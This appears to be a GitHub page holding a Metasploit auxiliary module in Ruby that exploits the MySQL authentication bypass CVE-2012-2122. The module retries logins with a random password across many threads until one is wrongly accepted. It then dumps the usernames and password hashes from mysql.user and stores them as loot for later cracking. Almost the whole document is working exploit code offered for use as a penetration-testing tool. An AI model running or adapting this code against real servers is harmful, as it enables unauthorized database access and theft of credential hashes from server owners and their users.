Skip to content
This repository
branch: master
Fetching contributors…

Octocat-spinner-32-eaf2f5

Cannot retrieve contributors at this time

file 217 lines (171 sloc) 6.357 kb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::MYSQL
  include Msf::Auxiliary::Report

  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'MySQL Authentication Bypass Password Dump',
      'Description' => %Q{
This module exploits a password bypass vulnerability in MySQL in order
to extract the usernames and encrypted password hashes from a MySQL server.
These hashes ares stored as loot for later cracking.
},
      'Author' => [
          'theLightCosine', # Original hashdump module
          'jcran' # Authentication bypass bruteforce implementation
        ],
      'References' => [
          ['CVE', '2012-2122'],
          ['OSVDB', '82804'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql']
        ],
      'DisclosureDate' => 'Jun 09 2012',
      'License' => MSF_LICENSE
    )

    deregister_options('PASSWORD')
    register_options( [
      OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ])
    ], self.class )
  end


  def run_host(ip)

    # Keep track of results (successful connections)
    results = []

    # Username and password placeholders
    username = datastore['USERNAME']
    password = Rex::Text.rand_text_alpha(rand(8)+1)

    # Do an initial check to see if we can log into the server at all

    begin
      socket = connect(false)
      x = ::RbMysql.connect({
        :host => rhost,
        :port => rport,
        :user => username,
        :password => password,
        :read_timeout => 300,
        :write_timeout => 300,
        :socket => socket
        })
      x.connect
      results << x

      print_good "#{rhost}:#{rport} The server accepted our first login as #{username} with a bad password"

    rescue RbMysql::HostNotPrivileged
      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"
      return
    rescue RbMysql::AccessDeniedError
      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error "#{rhost}:#{rport} Error: #{e}"
      return
    end

    # Short circuit if we already won
    if results.length > 0
      @mysql_handle = results.first
      return dump_hashes
    end


    #
    # Threaded login checker
    #
    max_threads = 16
    cur_threads = []

    # Try up to 1000 times just to be sure
    queue = [*(1 .. 1000)]

    while(queue.length > 0)
      while(cur_threads.length < max_threads)

        # We can stop if we get a valid login
        break if results.length > 0

        # keep track of how many attempts we've made
        item = queue.shift

        # We can stop if we reach 1000 tries
        break if not item

        # Status indicator
        print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0

        t = Thread.new(item) do |count|
          begin
            # Create our socket and make the connection
            s = connect(false)
            x = ::RbMysql.connect({
              :host => rhost,
              :port => rport,
              :user => username,
              :password => password,
              :read_timeout => 300,
              :write_timeout => 300,
              :socket => s,
              :db => nil
              })
            print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
            results << x
          rescue RbMysql::AccessDeniedError
          rescue Exception => e
            print_status "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"
          end
        end

        cur_threads << t

      end

      # We can stop if we get a valid login
      break if results.length > 0

      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        if not t.alive?
          cur_threads[ti] = nil
        end
      end

      # Remove any dead threads from the set
      cur_threads.delete(nil)

      ::IO.select(nil, nil, nil, 0.25)
    end

    # Clean up any remaining threads
    cur_threads.each {|x| x.kill }


    if results.length > 0
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw, dumping hashes...")
      @mysql_handle = results.first
      return dump_hashes
    end

    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
  end

  def dump_hashes

    # Grabs the username and password hashes and stores them as loot
    res = mysql_query("SELECT user,password from mysql.user")
    if res.nil?
      print_error("#{rhost}:#{rport} There was an error reading the MySQL User Table")
      return

    end

    # Create a table to store data
    tbl = Rex::Ui::Text::Table.new(
      'Header' => 'MysQL Server Hashes',
      'Indent' => 1,
      'Columns' => ['Username', 'Hash']
    )

    if res.size > 0
      res.each do |row|
        next unless (row[0].to_s + row[1].to_s).length > 0
        tbl << [row[0], row[1]]
        print_good("#{rhost}:#{rport} Saving HashString as Loot: #{row[0]}:#{row[1]}")
      end
    end

    this_service = nil
    if framework.db and framework.db.active
      this_service = report_service(
        :host => rhost,
        :port => rport,
        :name => 'mysql',
        :proto => 'tcp'
      )
    end

    report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?

  end

  # Stores the Hash Table as Loot for Later Cracking
  def report_hashes(hash_loot,service)
    filename= "#{rhost}-#{rport}_mysqlhashes.txt"
    path = store_loot("mysql.hashes", "text/plain", rhost, hash_loot, filename, "MySQL Hashes", service)
    print_status("#{rhost}:#{rport} Hash Table has been saved: #{path}")

  end

end
Something went wrong with that request. Please try again.